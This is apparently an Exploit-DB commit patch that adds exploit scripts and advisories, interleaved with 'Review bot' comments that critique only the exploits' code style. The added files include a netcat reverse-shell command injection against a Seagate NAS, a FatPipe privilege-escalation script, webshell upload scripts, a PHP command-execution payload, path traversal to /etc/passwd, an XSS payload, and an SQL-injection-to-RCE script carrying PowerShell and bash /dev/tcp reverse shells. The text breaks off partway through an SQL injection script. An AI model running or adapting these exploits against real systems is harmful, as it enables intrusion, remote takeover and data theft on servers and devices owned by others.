From 4f2cf56b3145f4ec8e579b56db663261c3bafd78 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sat, 23 Oct 2021 05:02:09 +0000 Subject: [PATCH] DB: 2021-10-23 11 changes to exploits/shellcodes Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection OpenSIS 8.0 'modname' - Directory Traversal Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload Budget and Expense Tracker System 1.0 - Arbitrary File Upload FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting Jetty 9.4.37.v20210219 - Information Disclosure Clinic Management System 1.0 - SQL injection to Remote Code Execution Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated) Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes) --- exploits/hardware/webapps/50132.py | 29 +++ exploits/hardware/webapps/50341.txt | 118 +++++++++++ exploits/hardware/webapps/50342.py | 191 ++++++++++++++++++ exploits/java/webapps/50438.txt | 20 ++ exploits/php/webapps/50259.txt | 22 +++ exploits/php/webapps/50264.py | 78 ++++++++ exploits/php/webapps/50326.txt | 52 +++++ exploits/php/webapps/50350.txt | 13 ++ exploits/php/webapps/50439.py | 98 ++++++++++ exploits/php/webapps/50440.txt | 116 +++++++++++ files_exploits.csv | 10 + files_shellcodes.csv | 1 + shellcodes/windows_x86-64/50291.c | 290 ++++++++++++++++++++++++++++ 13 files changed, 1038 insertions(+) create mode 100755 exploits/hardware/webapps/50132.py create mode 100644 exploits/hardware/webapps/50341.txt create mode 100755 exploits/hardware/webapps/50342.py create mode 100644 exploits/java/webapps/50438.txt create mode 100644 exploits/php/webapps/50259.txt create mode 100755 exploits/php/webapps/50264.py create mode 100644 exploits/php/webapps/50326.txt create mode 100644 exploits/php/webapps/50350.txt create mode 100755 exploits/php/webapps/50439.py create mode 100644 
exploits/php/webapps/50440.txt create mode 100644 shellcodes/windows_x86-64/50291.c diff --git a/exploits/hardware/webapps/50132.py b/exploits/hardware/webapps/50132.py new file mode 100755 index 000000000..4b2aa9629 --- /dev/null +++ b/exploits/hardware/webapps/50132.py @@ -0,0 +1,29 @@ +# Exploit Title: Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection +# Date: 15.07.2021 +# Discovered by: Jeroen - IT Nerdbox +# Exploit Author: Metin Yunus Kandemir +# Version: sg2000-2000.1331 +# Vendor Homepage: https://www.seagate.com/ +# Software Link: https://www.seagate.com/tr/tr/support/downloads/item/banas-220-firmware-master-dl/ + +#!/usr/bin/python3 + +import requests +import sys + +def exec(target, ncIp, ncPort): + print("[!] Please check netcat listener: "+ ncPort) + url = "http://" + target + "/backupmgt/localJob.php?session=fail;nc+"+ncIp+"+"+ncPort+"+-e+/bin/sh%00" + r = requests.get(url = url) + sys.exit(1) + +def main(args): + if len(args) != 4: + print("[*] usage: %s targetIp:port ncIp ncPort" % (args[0])) + print("[*] Example:python3 exploit.py 192.168.1.13 192.168.1.22 80") + sys.exit(1) + exec(target=args[1], ncIp=args[2], ncPort=args[3]) + + +if __name__ == "__main__": + main(args=sys.argv) \ No newline at end of file diff --git a/exploits/hardware/webapps/50341.txt b/exploits/hardware/webapps/50341.txt new file mode 100644 index 000000000..912ef064d --- /dev/null +++ b/exploits/hardware/webapps/50341.txt 
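Review bot: `def exec(target, ncIp, ncPort)` shadows the Python builtin, and both it and the usage branch in `main()` finish with `sys.exit(1)`, so the script reports failure to the shell even on the path where the request was sent; the success path should `sys.exit(0)` or simply return. The `#!/usr/bin/python3` line sits after seven header comments, so it is not honoured as a shebang — move it to line 1 or drop it. The local `r` in `exec` is assigned but never used.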
@@ -0,0 +1,118 @@ +# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) +# Date: 25.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.fatpipeinc.com + +FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access) + + +Vendor: FatPipe Networks Inc. +Product web page: https://www.fatpipeinc.com +Affected version: WARP / IPVPN / MPVPN + 10.2.2r38 + 10.2.2r25 + 10.2.2r10 + 10.1.2r60p82 + 10.1.2r60p71 + 10.1.2r60p65 + 10.1.2r60p58s1 + 10.1.2r60p58 + 10.1.2r60p55 + 10.1.2r60p45 + 10.1.2r60p35 + 10.1.2r60p32 + 10.1.2r60p13 + 10.1.2r60p10 + 9.1.2r185 + 9.1.2r180p2 + 9.1.2r165 + 9.1.2r164p5 + 9.1.2r164p4 + 9.1.2r164 + 9.1.2r161p26 + 9.1.2r161p20 + 9.1.2r161p17 + 9.1.2r161p16 + 9.1.2r161p12 + 9.1.2r161p3 + 9.1.2r161p2 + 9.1.2r156 + 9.1.2r150 + 9.1.2r144 + 9.1.2r129 + 7.1.2r39 + 6.1.2r70p75-m + 6.1.2r70p45-m + 6.1.2r70p26 + 5.2.0r34 + +Summary: FatPipe Networks invented the concept of router-clustering, +which provides the highest level of reliability, redundancy, and speed +of Internet traffic for Business Continuity and communications. FatPipe +WARP achieves fault tolerance for companies by creating an easy method +of combining two or more Internet connections of any kind over multiple +ISPs. FatPipe utilizes all paths when the lines are up and running, +dynamically balancing traffic over the multiple lines, and intelligently +failing over inbound and outbound IP traffic when ISP services and/or +components fail. + +FatPipe IPVPN balances load and provides reliability among multiple +managed and CPE based VPNs as well as dedicated private networks. FatPipe +IPVPN can also provide you an easy low-cost migration path from private +line, Frame or Point-to-Point networks. You can aggregate multiple private, +MPLS and public networks without additional equipment at the provider's +site. 
+ +FatPipe MPVPN, a patented router clustering device, is an essential part +of Disaster Recovery and Business Continuity Planning for Virtual Private +Network (VPN) connectivity. It makes any VPN up to 900% more secure and +300% times more reliable, redundant and faster. MPVPN can take WANs with +an uptime of 99.5% or less and make them 99.999988% or higher, providing +a virtually infallible WAN. MPVPN dynamically balances load over multiple +lines and ISPs without the need for BGP programming. MPVPN aggregates up +to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed +you need to keep your VPN up and running despite failures of service, line, +software, or hardware. + +Desc: The application has a hidden administrative account 'cmuser' that has +no password and has write access permissions to the device. The user cmuser +is not visible in Users menu list of the application. + +Tested on: Apache-Coyote/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5684 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php + + +30.05.2016 +25.07.2021 + +-- + + +Overview: +FatPipe Central Manager is a secure web based solution providing a centralized solution +to manage FatPipe's suite of WAN reliability and optimization products. Central Manager +allows you to configure, manage and monitor FatPipe's patented MPSec technology at the +click of a button. + +Central Manager = cmuser. +Once authenticated, you get admin rights. + +HTTP/1.1 200 OK +Server: Apache-Coyote/1.1 +Strict-Transport-Security: max-age=31536000 +X-Frame-Options: DENY +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +Content-Type: application/json;charset=ISO-8859-1 +Content-Length: 118 +Date: Fri, 06 Aug 2017 16:37:07 GMT +Connection: close + +{"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"} \ No newline at end of file 
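Review bot: The two bare dates `30.05.2016` and `25.07.2021` after the advisory URL carry no label, so a reader cannot tell which is discovery and which is disclosure; the same unlabeled pair appears in the header comment of 50342.py in this commit. Suggest labelling them, e.g. `30.05.2016 - discovered` / `25.07.2021 - published` (whichever the author intends). The affected-version list stops at 10.2.2r38 without a remediation or vendor-response line, which is what a defender triaging this needs first; the header `# Date: 25.07.2021` also disagrees with the `Date: Fri, 06 Aug 2017` stamp on the quoted response, so a sentence on when the capture was taken would avoid confusion.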
diff --git a/exploits/hardware/webapps/50342.py b/exploits/hardware/webapps/50342.py new file mode 100755 index 000000000..c2109cdc1 --- /dev/null +++ b/exploits/hardware/webapps/50342.py 
@@ -0,0 +1,191 @@ +# Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation +# Date: 25.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.fatpipeinc.com + +#!/usr/bin/env python3 +# +# +# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation +# +# +# Vendor: FatPipe Networks Inc. +# Product web page: https://www.fatpipeinc.com +# Affected version: WARP / IPVPN / MPVPN +# 10.2.2r38 +# 10.2.2r25 +# 10.2.2r10 +# 10.1.2r60p82 +# 10.1.2r60p71 +# 10.1.2r60p65 +# 10.1.2r60p58s1 +# 10.1.2r60p58 +# 10.1.2r60p55 +# 10.1.2r60p45 +# 10.1.2r60p35 +# 10.1.2r60p32 +# 10.1.2r60p13 +# 10.1.2r60p10 +# 9.1.2r185 +# 9.1.2r180p2 +# 9.1.2r165 +# 9.1.2r164p5 +# 9.1.2r164p4 +# 9.1.2r164 +# 9.1.2r161p26 +# 9.1.2r161p20 +# 9.1.2r161p17 +# 9.1.2r161p16 +# 9.1.2r161p12 +# 9.1.2r161p3 +# 9.1.2r161p2 +# 9.1.2r156 +# 9.1.2r150 +# 9.1.2r144 +# 9.1.2r129 +# 7.1.2r39 +# 6.1.2r70p75-m +# 6.1.2r70p45-m +# 6.1.2r70p26 +# 5.2.0r34 +# +# Summary: FatPipe Networks invented the concept of router-clustering, +# which provides the highest level of reliability, redundancy, and speed +# of Internet traffic for Business Continuity and communications. FatPipe +# WARP achieves fault tolerance for companies by creating an easy method +# of combining two or more Internet connections of any kind over multiple +# ISPs. FatPipe utilizes all paths when the lines are up and running, +# dynamically balancing traffic over the multiple lines, and intelligently +# failing over inbound and outbound IP traffic when ISP services and/or +# components fail. +# +# FatPipe IPVPN balances load and provides reliability among multiple +# managed and CPE based VPNs as well as dedicated private networks. FatPipe +# IPVPN can also provide you an easy low-cost migration path from private +# line, Frame or Point-to-Point networks. You can aggregate multiple private, +# MPLS and public networks without additional equipment at the provider's +# site. 
+# +# FatPipe MPVPN, a patented router clustering device, is an essential part +# of Disaster Recovery and Business Continuity Planning for Virtual Private +# Network (VPN) connectivity. It makes any VPN up to 900% more secure and +# 300% times more reliable, redundant and faster. MPVPN can take WANs with +# an uptime of 99.5% or less and make them 99.999988% or higher, providing +# a virtually infallible WAN. MPVPN dynamically balances load over multiple +# lines and ISPs without the need for BGP programming. MPVPN aggregates up +# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed +# you need to keep your VPN up and running despite failures of service, line, +# software, or hardware. +# +# Desc: The application suffers from a privilege escalation vulnerability. +# A normal user (group USER, 0) can elevate her privileges by sending a HTTP +# POST request and setting the JSON parameter 'privilege' to integer value +# '1' gaining administrative rights (group ADMINISTRATOR, 1). 
+# +# Tested on: Apache-Coyote/1.1 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2021-5685 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php +# +# +# 30.05.2016 +# 25.07.2021 +# +# + +import sys +import time####### +import requests################ +requests.packages.urllib3.disable_warnings() + +if len(sys.argv) !=2: + print + print("********************************************************") + print("* *") + print("* Privilege escalation from USER to ADMINISTRATOR role *") + print("* in *") + print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *") + print("* *") + print("* ZSL-2021-5685 *") + print("* *") + print("********************************************************") + print("\n[POR] Usage: ./escalator.py [IP]") + sys.exit() + +ajpi=sys.argv[1] +print +juzer=raw_input("[UNE] Username: ") +pasvord=raw_input("[UNE] Password: ") + +sesija=requests.session() +logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'} + +hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"', + 'Accept' :'application/json, text/javascript, */*; q=0.01', + 'X-Requested-With':'XMLHttpRequest', + 'Sec-Ch-Ua-Mobile':'?0', + 'User-Agent' :'Fatnet/1.b', + 'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8', + 'Origin' :'https://'+ajpi, + 'Sec-Fetch-Site' :'same-origin', + 'Sec-Fetch-Mode' :'cors', + 'Sec-Fetch-Dest' :'empty', + 'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet', + 'Accept-Encoding' :'gzip, deflate', + 'Accept-Language' :'en-US,en;q=0.9', + 'Connection' :'close'} + +juarel1='https://'+ajpi+'/fpui/loginServlet' +alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False) + +if not 'success' in alo.text: + print('[GRE] Login error.') + sys.exit() +else: + print('[POR] Authentication successful.') + +print('[POR] Climbing the ladder...') + +sluba=''' +|| || .--._ +||====|| __ '---._) +|| ||"")\ Q Q ) +||====|| 
=_/ o / +|| || | \_.-;-'-,._ +||====|| | ' o---o ) +|| || \ /H __H\ / +||====|| '-' \"")\/ | +|| || _ |_='-)_/ +||====|| / '. ) +|| || / / +||====|| |___/\| / +|| || |_| | | +||====|| / ) \\ \\ +|| || (__/ \___\\ +||====|| \_\\ +|| || / ) +||====|| (__/ +''' + +for k in sluba: + sys.stdout.write(k) + sys.stdout.flush() + time.sleep(0.01) + +juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest' +posta={ +'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]' +} +stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False) + +if not 'true' in stanje.text: + print('\n[GRE] Something\'s fishy!') + sys.exit() +else: + print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.') + sys.exit() \ No newline at end of file diff --git a/exploits/java/webapps/50438.txt b/exploits/java/webapps/50438.txt new file mode 100644 index 000000000..6e1381860 --- /dev/null +++ b/exploits/java/webapps/50438.txt @@ -0,0 +1,20 @@ +# Exploit Title: Jetty 9.4.37.v20210219 - Information Disclosure +# Date: 2021-10-21 +# Exploit Author: Mayank Deshmukh +# Vendor Homepage: https://www.eclipse.org/jetty/ +# Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.37.v20210219/ +# Version: 9.4.37.v20210219 and 9.4.38.v20210224 +# Tested on: Kali Linux +# CVE : CVE-2021-28164 + +POC #1 - web.xml + +GET /%2e/WEB-INF/web.xml HTTP/1.1 +Host: localhost:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 \ No newline at end of file 
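Review bot: The `# Version:` line names both 9.4.37.v20210219 and 9.4.38.v20210224, but the title and the `# Software Link:` cover only 9.4.37; either widen the title to match or say the link is for one of the two. The request is labelled `POC #1` yet no second PoC follows, so the numbering reads as if something was dropped. A one-line pointer to the fixed release for CVE-2021-28164 would help readers triage, since the file gives no remediation information.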
diff --git a/exploits/php/webapps/50259.txt b/exploits/php/webapps/50259.txt new file mode 100644 index 000000000..0ac46e09c --- /dev/null +++ b/exploits/php/webapps/50259.txt @@ -0,0 +1,22 @@ +# Exploit Title: OpenSIS 8.0 'modname' - Directory/Path Traversal +# Date: 09-02-2021 +# Exploit Author: Eric Salario +# Vendor Homepage: http://www.os4ed.com/ +# Software Link: https://opensis.com/download +# Version: 8.0 +# Tested on: Windows, Linux +# CVE: CVE-2021-40651 + +The 'modname' parameter in the 'Modules.php' is vulnerable to local file inclusion vulnerability. This vulnerability can be exploited to expose sensitive information from arbitrary files in the underlying system. + +To exploit the vulnerability, someone must login as the "Parent" user, navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php. The 'modname' parameter and requests the Portal.php's contents. By going back a few directory using '..%2f' decoded as '../' it was possible to disclose arbitrary file from the server's filesystem as long as the application has access to the file. + +1. Login as "Parent" + +2. Open a web proxy such as BurpSuite and capture the requests + +3. Navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= + +4. Check the response + +PoC: https://youtu.be/wFwlbXANRCo \ No newline at end of file diff --git a/exploits/php/webapps/50264.py b/exploits/php/webapps/50264.py new file mode 100755 index 000000000..28eae8ba2 --- /dev/null +++ b/exploits/php/webapps/50264.py 
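Review bot: The title calls the issue a Directory/Path Traversal while the first paragraph calls it a local file inclusion, and the CSV entry added in this commit uses the title wording; pick one term and use it throughout. The second paragraph is hard to parse (`someone must login as the "Parent" user, navigate to ... The 'modname' parameter and requests the Portal.php's contents`), and `By going back a few directory` should read `By going back a few directories`. The `# Date: 09-02-2021` line uses a different format from the sibling advisories in this commit (`2021-10-21`), which makes the index harder to sort.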
@@ -0,0 +1,78 @@ +# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload +# Date: 03/09/2021 +# Exploit Author: a-rey +# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14928 +# Version: v1.0 +# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0 +# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import os +import time +import logging +import requests +import argparse + +BANNER = """ +╔═════════════════════════════════════════════════════════════════════════════════════════════════╗ +║ Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution ║ +╚═════════════════════════════════════════════════════════════════════════════════════════════════╝ + by: \033[0m\033[1;31m █████╗ ██████╗ ███████╗██╗ ██╗\033[0m + \033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║ ██║\033[0m + \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝\033[0m + \033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[0m + \033[0m\033[1;35m██║ ██║ ██║ ██║███████╗ ██║ \033[0m + \033[0m\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m +""" + + +def exploit(url:str, file:str, delay:int) -> None: + if not os.path.exists(file): + logging.error(f'webshell payload "{file}"" does not exist?') + return + logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...') + uploadTime = int(time.time()) + r = requests.post(url + '/classes/SystemSettings.php', + files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous + params={'f' : 'update_settings'}, + verify=False + ) + if not r.ok: + logging.error('HTTP upload request failed') + return + logging.info(f'finding new payload 
file name on target (+/- {delay} seconds) ...') + for i in range(uploadTime - delay, uploadTime + delay + 1): + r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False) + logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...') + # NOTE: website will send redirects for all files that do not exist + if r.status_code != 302: + logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}') + return + logging.error('failed to find payload on target') + logging.warning('maybe need a larger delay or uploads directory is not writable?') + return + + +if __name__ == '__main__': + # parse arguments + parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) + parser.add_argument('-u', '--url', help='website URL', type=str, required=True) + parser.add_argument('-p', '--payload', help='PHP webshell file to upload', type=str, required=True) + parser.add_argument('-d', '--delay', help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60) + parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False) + args = parser.parse_args() + # define logger + logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG') + logging.SUCCESS = logging.CRITICAL + 1 + logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') + logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') + logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') + logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') + logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) + # print banner + print(BANNER) + # run exploit + exploit(args.url, args.payload, args.delay) \ No newline at end of file 
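Review bot: `open(file, 'rb')` inside the `files=` argument of the `requests.post` call in `exploit()` is never closed, so the handle leaks until garbage collection; wrap the post in `with open(file, 'rb') as fh:` and pass `fh`. The error string a few lines earlier has a doubled quote, `"{file}"" does not exist?`. `logging.success` is only attached under `if __name__ == '__main__'`, yet `exploit()` calls it unconditionally, so importing the module and calling `exploit()` raises AttributeError on that path — either move the custom level setup to module scope or document the dependency with a comment on the function.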
diff --git a/exploits/php/webapps/50326.txt b/exploits/php/webapps/50326.txt new file mode 100644 index 000000000..bfb9ee9a3 --- /dev/null +++ b/exploits/php/webapps/50326.txt 
@@ -0,0 +1,52 @@ +# Exploit Title: Budget and Expense Tracker System 1.0 - Arbitrary File Upload +# Exploit Author: ()t/\/\1 +# Date: 23/09/2021 +# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html +# Tested on: Linux +# Version: 2.0 + +# Exploit Description: +The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands. + + +# PoC request + +POST /expense_budget/classes/Users.php?f=save HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/expense_budget/admin/?page=user +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------1399170066243244238234165712 +Content-Length: 824 +Connection: close +Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c + +-----------------------------1399170066243244238234165712 +Content-Disposition: form-data; name="id" + +1 +-----------------------------1399170066243244238234165712 +Content-Disposition: form-data; name="firstname" + +A +-----------------------------1399170066243244238234165712 +Content-Disposition: form-data; name="lastname" + +a +-----------------------------1399170066243244238234165712 +Content-Disposition: form-data; name="username" + +admin +-----------------------------1399170066243244238234165712 +Content-Disposition: form-data; name="password" + + +-----------------------------1399170066243244238234165712 +Content-Disposition: form-data; name="img"; filename="na3na3.php" +Content-Type: image/jpeg + +";system($_GET['cmd']); ?> +-----------------------------1399170066243244238234165712-- \ No newline at end of file 
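Review bot: The header says `# Version: 2.0` while the title and the CSV entry added in this commit say `1.0`; one of them is wrong and the index will be searched by that number. The `# Tested on: Linux` line is also sparser than the sibling advisories here (OS plus stack), and there is no `# Software Link:` line even though the vendor page is given. The `# Exploit Description:` paragraph says "these issues" in the plural for a single finding.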
diff --git a/exploits/php/webapps/50350.txt b/exploits/php/webapps/50350.txt new file mode 100644 index 000000000..e27954ca5 --- /dev/null +++ b/exploits/php/webapps/50350.txt @@ -0,0 +1,13 @@ +# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS) +# Date: 2/3/2021 +# Author: 0xB9 +# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip +# Version: 1.3.0 +# Tested on: Windows 10 +# CVE: CVE-2021-24286 + +1. Description: +This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS. + +2. Proof of Concept: +wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/); \ No newline at end of file diff --git a/exploits/php/webapps/50439.py b/exploits/php/webapps/50439.py new file mode 100755 index 000000000..abc88f87f --- /dev/null +++ b/exploits/php/webapps/50439.py 
@@ -0,0 +1,98 @@ +# Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution +# Date:21/10/2021 +# Exploit Author: Pablo Santiago +# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip +# Version: 1.0 +# Tested on: Windows 7 and Ubuntu 21.10 +# References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e + +# Vulnerability: Through SQL injection to bypass the login form it is +possible to upload a malicious file and after use that malicious file to +execute code in the remote system. +# Proof of Concept: + +import requests +import sys +import time + + +session = requests.Session() +#http_proxy = "http://127.0.0.1:8080" +#https_proxy = "https://127.0.0.1:8080" + +#proxyDict = {"http" : http_proxy, +# "https" : https_proxy} + +def windows(HPW,host,shell_name): +payload = +"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()""""" +host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload +#print(payload) +try: +request_rce = requests.get(host2,timeout=8) +except requests.exceptions.ReadTimeout: +pass + + +def linux(HPL,host,shell_name): +payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"' +host2 = host+'/'+'/uploadImage/Logo/' + shell_name + 
'.php?cmd='+payload +#print(payload) +try: +request_rce = requests.get(host2,timeout=8) +except requests.exceptions.ReadTimeout: +pass + +def main(): + +host = sys.argv[1] +shell_name = sys.argv[2] +url = host + '/login.php' +values = {'user': "admin", + 'email': "' OR 1 -- -", + 'password': '', + 'btn_login': "" + } + +r = session.post(url, data=values) +cookie = session.cookies.get_dict()['PHPSESSID'] + +data = { 'btn_web':''} +headers= {'Cookie': 'PHPSESSID='+cookie} + + + +request = session.post(host+ '/manage_website.php', data=data, +headers=headers,files={"website_image":(shell_name+'.php',"")}) +print("") +print('[*] Your Simple Webshell was uploaded to ' + host + +'/uploadImage/Logo/' + shell_name + '.php' ) +print("") +LHOST = input('[+] Enter your LHOST: ') +LPORT = input('[+] Enter your LPORT: ') +print("") +HPW= "'"+LHOST+"'"+','+LPORT +HPL= ""+LHOST+""+'/'+LPORT + +print('[+] Option 1: Windows') +print('[+] Option 2: Linux') + +option = input('[+] Choose OS: ') + +if option == "1": + +windows(HPW,host,shell_name) +exit() + +elif option == "2": +linux(HPL,host,shell_name) +exit() + +else: +print("Please choose Windows or Linux") + +main() + +#Usage: python3 host shell_name +#Example: python3 http://localhost/clinic shell \ No newline at end of file diff --git a/exploits/php/webapps/50440.txt b/exploits/php/webapps/50440.txt new file mode 100644 index 000000000..5cc214d29 --- /dev/null +++ b/exploits/php/webapps/50440.txt 
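Review bot: `request_rce` in `windows()` and `linux()` and `request` in `main()` are assigned but never read, and the proxy block near the top is commented-out dead code; drop them or use them. The `#Usage:` / `#Example:` lines at the very end omit the script name and sit where nobody looks — they belong in a module docstring at the top. `exit()` is the interactive-session helper; in a script prefer `sys.exit()` (sys is already imported).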
@@ -0,0 +1,116 @@ +# Exploit Title: Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated) +# Exploit Author: Sam Ferguson (@AffineSecurity) and Drew Jones (@qhum7sec) +# Date: 2021-10-21 +# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip +# Version: 1.0 +# Tested On: Windows 10 + XAMPP + Python 3 + +# Vulnerability: An attacker can perform a blind boolean-based SQL injection attack, which can provide attackers +# with access to the username and md5 hash of any administrators. +# Vulnerable file: /online-course-registration/Online/pincode-verification.php +# Proof of Concept: + +#!/usr/bin/python3 + +import requests +import sys +import string + +def exploit(hostname, username, password): + + # Building bruteforce list + pass_list = list(string.ascii_lowercase) + pass_list += list(range(0,10)) + pass_list = map(str, pass_list) + pass_list = list(pass_list) + + user_list = pass_list + user_list += list(string.ascii_uppercase) + user_list = map(str, user_list) + user_list = list(user_list) + + session = requests.Session() + + # This URL may change based on the implementation - change as needed + url = f"{hostname}/online-course-registration/Online/index.php" + headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/index.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} + data = 
